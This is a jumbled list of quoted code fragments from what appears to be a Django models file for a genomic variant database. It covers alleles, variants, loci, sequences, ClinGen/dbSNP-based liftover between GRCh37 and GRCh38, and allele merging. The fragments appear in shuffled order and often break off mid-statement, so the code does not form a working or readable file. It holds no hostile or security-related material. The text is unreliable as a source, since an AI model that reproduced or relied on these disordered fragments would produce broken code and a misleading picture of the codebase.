"genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple",
"VCF in the desired genome build For others (NCBI Remap) we need to",
"VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover",
"if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37,",
"\"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self,",
"return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild)",
"Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def grch38(self) ->",
"-> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self)",
"'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self,",
"@property def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) ->",
"@property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name =",
"alt = m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr)",
"import Optional, Pattern, Tuple, Iterable, Set import django.dispatch from django.conf import settings from",
"ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return",
"= (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN",
"@staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\",",
"locus.ref should always be standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return",
"get_hgvs_variant_tuple # Check if the other build shares existing contig genome_build_contigs = set(c.pk",
"1 per line in a VCF file (multiple Variants with different alt alleles",
"error = models.JSONField(null=True) # Only set on error class Meta: unique_together = (\"variant\",",
"else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs):",
"GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write VCF coordinates during liftover.",
"F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def",
"the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in",
"genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to",
"va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property def equivalent_variants(self) ->",
"| Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a genome",
"genome build For others (NCBI Remap) we need to write the source genome",
"can add that unique_together constraint We only expect to store Alleles for a",
"a liftover pipeline (once per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele,",
"q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"):",
"Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq !=",
"VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant = models.ForeignKey(Variant,",
"models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not",
"import logging import re from typing import Optional, Pattern, Tuple, Iterable, Set import",
"alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele",
"and not best_attempt: raise ValueError(f'Could not find a variant in allele {self.id} for",
"def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert,",
"return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build: source",
"None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names",
"any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta",
"models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination",
"\"\"\" 1 per line in a VCF file (multiple Variants with different alt",
"re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent -",
"\"\"\" Merge other_allele into this allele \"\"\" if self == other_allele: raise ValueError(f\"Attempt",
"self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int",
"in UploadedFile for the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource,",
"import get_hgvs_variant_tuple # Check if the other build shares existing contig genome_build_contigs =",
"old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2,",
"itself!\") can_merge = True merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele",
"= (\"contig\", \"position\", \"ref\") @property def chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position}",
"can_merge = False merge_log_message = f\"Error performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele,",
"from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom",
"@lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None",
"class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually used as a cached",
"ValueError: # Various contig errors all subclass from this pass if g_hgvs is",
"-> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq",
"= f\"Allele {self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\" return name def __format__(self,",
"self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return",
"class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom)",
"def get_absolute_url(self): # will show allele if there is one, otherwise go to",
"-> AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet:",
"Used by to write VCF coordinates during liftover. Can be slow (API call)",
"liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return",
"via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source",
"source of alleles for liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return",
"it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele",
"conversion_tool = None g_hgvs = None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool",
"VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to have 4 groups, returns (chrom,",
"ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\", \"ref\") @property def",
"of %s/%s/%s - deleting this one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property",
"dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP",
"{genome_build}') if not va: va = vas.first() if va: return va.variant raise ValueError(f'Could",
"ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str,",
"allele {self.id} for build {genome_build}') if not va: va = vas.first() if va:",
"contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta:",
"= dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple =",
"all builds, but at least one # links there, and can't have another,",
"VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build,",
"GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple)))",
"ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if",
"a VCF file (ref + >= 1 alts pointing to the same locus",
"django.dispatch import receiver from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from lazy",
"ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple =",
"\"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class",
"import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild,",
"choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on error",
"of calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele,",
"self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None",
"Alleles must have already been created - allele_source used to retrieve them The",
"ID is set to Allele.pk and then creating VariantAllele entries for the variant/allele",
"m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig =",
"in those cases # we'll have the same variant linked through different VariantAlleles",
"django.db.models import Value as V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from",
"genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple:",
"@property def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length",
"models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return",
"a source of alleles for liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self):",
"TimeStampedModel from lazy import lazy from model_utils.managers import InheritanceManager from flags.models import FlagCollection,",
"= re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent",
":= regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom, position, ref, alt =",
"Iterable, Set import django.dispatch from django.conf import settings from django.contrib.auth.models import User from",
"creating VariantAllele entries for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can",
"if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def start(self): return",
"class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant,",
"return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self):",
"def __format__(self, format_spec: str): if format_spec == 'CA' and (cligen_allele := self.clingen_allele): return",
"locus) There is only 1 Locus for a given chrom/position/ref per database (handled",
"= models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a VCF",
"if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None:",
"variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from",
"Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver from django.urls.base import",
"\"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs()",
"return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple =",
"the same locus) There is only 1 Locus for a given chrom/position/ref per",
"genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va = None if genome_build:",
"allele if there is one, otherwise go to variant page return reverse('view_allele', kwargs={\"pk\":",
"Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def variants(self): return",
"other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names =",
"the other build shares existing contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values())",
"done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build",
"Only set on error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def",
"build to resolve to the same allele (due to our normalization not being",
"({self.clingen_allele})\" return name def __format__(self, format_spec: str): if format_spec == 'CA' and (cligen_allele",
"if not va and not best_attempt: raise ValueError(f'Could not find a variant in",
"def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first():",
"other_allele into this allele \"\"\" if self == other_allele: raise ValueError(f\"Attempt to merge",
"variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele into this",
"to retrieve them The VCF (in genome_build build) is set in UploadedFile for",
"\"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod",
"models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model):",
"self.variant_alleles() va = None if genome_build: va = vas.filter(genome_build=genome_build).first() if not va and",
"from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition",
"represent the different alleles at a locus Usually 2+ per line in a",
"= models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error =",
"on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance \"\"\" return",
"from genes.hgvs import get_hgvs_variant_tuple # Check if the other build shares existing contig",
"allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property",
"[self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav,",
"works if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs,",
"{self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover,",
"models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\", \"ref\") @property",
"vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS:",
"add via migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length =",
"def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different alleles",
"__str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\" return name",
"to md5sum seq and make the constraint on that. Another possible solution is",
"\"\"\" variant_tuple = None if m := regex_pattern.match(variant_string): chrom, position, ref, alt =",
"def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\"",
"into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message",
"\"\"\" objects = InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def",
"DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple =",
"best_attempt=False) except ValueError: return None @lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(),",
"models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together =",
"name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string in a query \"\"\"",
"on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant but",
"btree_gist extension (requires postgres Admin rights). Django 3 has ExclusionConstraint, Postgres contrib has",
"line in a VCF file (multiple Variants with different alt alleles point to",
"Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration \"\"\"",
"= {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs)",
"import Value as V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields",
"variants from the same genome build to resolve to the same allele (due",
"genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass",
"str, max_length: int = 20): if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return",
"point to same allele This is generally done via ClinGen Allele Registry, but",
"variant but invalid error_message = models.TextField() class Meta: unique_together = ('liftover', 'allele') def",
"cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position",
"existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele = self",
"= models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition =",
"is 8191\" The easiest solution is to md5sum seq and make the constraint",
"end AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\")",
"standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and",
"import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch",
"GRCh37/38 share MT and some unplaced scaffolds) - in those cases # we'll",
"from lazy import lazy from model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal,",
"ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom,",
"chrom, position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\"",
"= VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to have 4 groups, returns",
"import Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver from django.urls.base",
"source = \"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to",
"(in genome_build build) is set in UploadedFile for the UploadPipeline \"\"\" user =",
"used to retrieve them The VCF (in genome_build build) is set in UploadedFile",
"def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele:",
"a locus Usually 2+ per line in a VCF file (ref + >=",
"GenomeBuild): \"\"\" This is called at the end of a liftover pipeline (once",
"return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError:",
"g_hgvs = None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except",
"# Optional, if got a variant but invalid error_message = models.TextField() class Meta:",
"Registry, but sometimes that can fail. Linked against Variant with VariantAllele below \"\"\"",
"not special or reference) \"\"\" # locus.ref should always be standard... return self.alt.is_standard_sequence()",
"def coordinate(self) -> VariantCoordinate: locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position,",
"on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if",
"unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def",
"GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE)",
"raise ValueError(f'Could not find any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild)",
"= None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def",
"def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants",
"self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: # Retry",
"self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\" Variant alt sequence is standard [GATCN]",
"None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains",
"= self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref,",
"in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by",
"VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return",
"source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def",
"a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP",
"equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele)",
"we'll have the same variant linked through different VariantAlleles (so it can't be",
"import receiver from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from lazy import",
"indexes but that requires installing the btree_gist extension (requires postgres Admin rights). Django",
"get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs",
"import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN =",
"if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele:",
"this one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self) -> str:",
"(handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt",
"can_merge = True merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if",
"pos ref alt') class Sequence(models.Model): \"\"\" We want to guarantee seq is unique",
"deleting this one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self) ->",
"set of variants - usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES =",
"flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va =",
"\"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele",
"models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional,",
"grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def",
"self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\",",
"= None if genome_build: va = vas.filter(genome_build=genome_build).first() if not va and not best_attempt:",
"on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a VCF where ID",
"not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line in a VCF file",
"in allele {self.id} for build {genome_build}') if not va: va = vas.first() if",
"linked through different VariantAlleles (so it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE)",
"if self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\"",
